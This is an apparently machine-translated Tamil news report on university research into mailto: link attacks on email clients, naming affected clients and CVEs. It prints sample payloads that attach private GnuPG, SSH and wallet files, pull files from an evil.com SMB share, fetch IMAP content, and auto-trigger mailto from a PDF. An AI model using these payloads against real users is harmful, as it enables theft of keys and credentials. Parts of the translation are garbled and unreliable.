"mailto:" இணைப்புகளைப் பயன்படுத்தி மின்னஞ்சல் கிளையன்ட் பயனர்களைத் தாக்குகிறது

ரூர் பல்கலைக்கழகம் போச்சும் (ஜெர்மனி) ஆராய்ச்சியாளர்கள் பகுப்பாய்வு செய்யப்பட்டது (எம்) மேம்பட்ட அளவுருக்களுடன் "mailto:" இணைப்புகளை செயலாக்கும் போது அஞ்சல் வாடிக்கையாளர்களின் நடத்தை. பரிசோதிக்கப்பட்ட இருபது மின்னஞ்சல் கிளையண்டுகளில் ஐந்து பேர் "இணைப்பு" அளவுருவைப் பயன்படுத்தி வள மாற்றீட்டைக் கையாளும் தாக்குதலால் பாதிக்கப்படக்கூடியவர்கள். மேலும் ஆறு மின்னஞ்சல் கிளையண்டுகள் PGP மற்றும் S/MIME விசை மாற்று தாக்குதலுக்கு ஆளாக நேரிடும், மேலும் மூன்று கிளையண்டுகள் மறைகுறியாக்கப்பட்ட செய்திகளின் உள்ளடக்கங்களை பிரித்தெடுக்கும் தாக்குதலுக்கு ஆளாக நேரிடும்.

இணைப்புகள் «இதற்கு அனுப்பு:"இணைப்பில் குறிப்பிடப்பட்டுள்ள முகவரிக்கு ஒரு கடிதம் எழுதுவதற்காக மின்னஞ்சல் கிளையண்டைத் திறப்பதை தானியக்கமாக்கப் பயன்படுகிறது. முகவரிக்கு கூடுதலாக, இணைப்பின் ஒரு பகுதியாக, கடிதத்தின் பொருள் மற்றும் வழக்கமான உள்ளடக்கத்திற்கான டெம்ப்ளேட் போன்ற கூடுதல் அளவுருக்களை நீங்கள் குறிப்பிடலாம். முன்மொழியப்பட்ட தாக்குதல் "இணைப்பு" அளவுருவைக் கையாளுகிறது, இது உருவாக்கப்பட்ட செய்தியுடன் இணைப்பை இணைக்க உங்களை அனுமதிக்கிறது.

அஞ்சல் கிளையண்டுகளான Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL குறிப்புகள் (CVE-2020-4089) மற்றும் Pegasus Mail ஆகியவை உங்களைத் தானாக இணைக்கும் அற்பமான தாக்குதலுக்கு ஆளாகின்றன. "mailto:?attach=path_to_file" போன்ற இணைப்பு மூலம் குறிப்பிடப்பட்ட எந்த உள்ளூர் கோப்பு. ஒரு எச்சரிக்கையைக் காட்டாமல் கோப்பு இணைக்கப்பட்டுள்ளது, எனவே சிறப்பு கவனம் இல்லாமல், கடிதம் இணைப்புடன் அனுப்பப்படும் என்பதை பயனர் கவனிக்காமல் இருக்கலாம்.

எடுத்துக்காட்டாக, "mailto: போன்ற இணைப்பைப் பயன்படுத்துதல்:[மின்னஞ்சல் பாதுகாக்கப்பட்டது]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" நீங்கள் GnuPG இலிருந்து தனிப்பட்ட விசைகளை கடிதத்தில் செருகலாம். கிரிப்டோ வாலட்கள் (~/.bitcoin/wallet.dat), SSH விசைகள் (~/.ssh/id_rsa) மற்றும் பயனருக்கு அணுகக்கூடிய கோப்புகளின் உள்ளடக்கங்களையும் நீங்கள் அனுப்பலாம். மேலும், “attach=/tmp/*.txt” போன்ற கட்டமைப்பைப் பயன்படுத்தி முகமூடி மூலம் கோப்புகளின் குழுக்களை இணைக்க தண்டர்பேர்ட் உங்களை அனுமதிக்கிறது.

உள்ளூர் கோப்புகளுக்கு கூடுதலாக, சில மின்னஞ்சல் கிளையன்ட்கள் பிணைய சேமிப்பகத்திற்கான இணைப்புகள் மற்றும் IMAP சேவையகத்தில் உள்ள பாதைகளை செயலாக்குகின்றன. குறிப்பாக, "attach=\\evil.com\dummyfile" போன்ற இணைப்புகளைச் செயலாக்கும் போது பிணைய கோப்பகத்திலிருந்து ஒரு கோப்பை மாற்ற IBM குறிப்புகள் உங்களை அனுமதிக்கிறது, அத்துடன் தாக்குபவர் கட்டுப்படுத்தும் SMB சேவையகத்திற்கு இணைப்பை அனுப்புவதன் மூலம் NTLM அங்கீகார அளவுருக்களைத் தடுக்கிறது. (தற்போதைய அங்கீகார அளவுருக்கள் பயனருக்கு கோரிக்கை அனுப்பப்படும்).

“attach=imap:///fetch>UID>/INBOX>1/” போன்ற கோரிக்கைகளை Thunderbird வெற்றிகரமாக செயலாக்குகிறது, இது IMAP சர்வரில் உள்ள கோப்புறைகளிலிருந்து உள்ளடக்கத்தை இணைக்க உங்களை அனுமதிக்கிறது. அதே நேரத்தில், IMAP இலிருந்து பெறப்பட்ட செய்திகள், OpenPGP மற்றும் S/MIME வழியாக குறியாக்கம் செய்யப்பட்டு, அனுப்பும் முன் அஞ்சல் கிளையண்டால் தானாகவே மறைகுறியாக்கப்படும். தண்டர்பேர்டின் டெவலப்பர்கள் அறிவிக்கப்பட்டது பிப்ரவரி மற்றும் பிரச்சினை பற்றி தண்டர்பேர்ட் 78 சிக்கல் ஏற்கனவே சரி செய்யப்பட்டுள்ளது (தண்டர்பேர்ட் கிளைகள் 52, 60 மற்றும் 68 பாதிக்கப்படக்கூடியவை).

தண்டர்பேர்டின் பழைய பதிப்புகள், ஆராய்ச்சியாளர்களால் முன்மொழியப்பட்ட PGP மற்றும் S/MIME ஆகியவற்றில் மற்ற இரண்டு தாக்குதல் வகைகளால் பாதிக்கப்படக்கூடியதாக இருந்தது. குறிப்பாக, Thunderbird, அத்துடன் OutLook, PostBox, eM Client, MailMate மற்றும் R2Mail2 ஆகியவை முக்கிய மாற்றுத் தாக்குதலுக்கு உட்பட்டன, அஞ்சல் கிளையன்ட் தானாகவே S/MIME செய்திகளில் அனுப்பப்படும் புதிய சான்றிதழ்களை இறக்குமதி செய்து நிறுவுகிறது. பயனரால் ஏற்கனவே சேமித்து வைக்கப்பட்டுள்ள பொது விசைகளை மாற்றியமைக்க தாக்குதல் நடத்துபவர்.

தண்டர்பேர்ட், போஸ்ட்பாக்ஸ் மற்றும் மெயில்மேட் ஆகியவை பாதிக்கப்படக்கூடிய இரண்டாவது தாக்குதல், வரைவுச் செய்திகளைத் தானாகச் சேமிப்பதற்கான பொறிமுறையின் அம்சங்களைக் கையாளுகிறது மற்றும் மெயில்டோ அளவுருக்களைப் பயன்படுத்தி, மறைகுறியாக்கப்பட்ட செய்திகளின் மறைகுறியாக்கத்தைத் தொடங்க அல்லது தன்னிச்சையான செய்திகளுக்கு டிஜிட்டல் கையொப்பத்தைச் சேர்க்க அனுமதிக்கிறது. தாக்குதலாளியின் IMAP சேவையகத்திற்கு முடிவை அனுப்புதல். இந்தத் தாக்குதலில், மறைக்குறியீடு "உடல்" அளவுரு மூலம் அனுப்பப்படுகிறது, மேலும் தாக்குபவர்களின் IMAP சேவையகத்திற்கு அழைப்பைத் தொடங்க "மெட்டா புதுப்பிப்பு" குறிச்சொல் பயன்படுத்தப்படுகிறது. உதாரணத்திற்கு: ' '

பயனர் தொடர்பு இல்லாமல் "mailto:" இணைப்புகளைத் தானாகச் செயல்படுத்த, சிறப்பாக வடிவமைக்கப்பட்ட PDF ஆவணங்களைப் பயன்படுத்தலாம் - PDF இல் உள்ள OpenAction செயல், ஆவணத்தைத் திறக்கும் போது தானாகவே mailto கையாளுதலைத் தொடங்க உங்களை அனுமதிக்கிறது:

%PDF-1.5
1 0 obj
<< /Type /Catalog /OpenAction [2 0 R] >>
endobj

2 0 obj
<< /Type /Action /S /URI/URI (mailto:?body=——தொடங்கு PGP MESSAGE—[…])>>
endobj

"mailto:" இணைப்புகளைப் பயன்படுத்தி மின்னஞ்சல் கிளையன்ட் பயனர்களைத் தாக்குகிறது

ஆதாரம்: opennet.ru

கருத்தைச் சேர்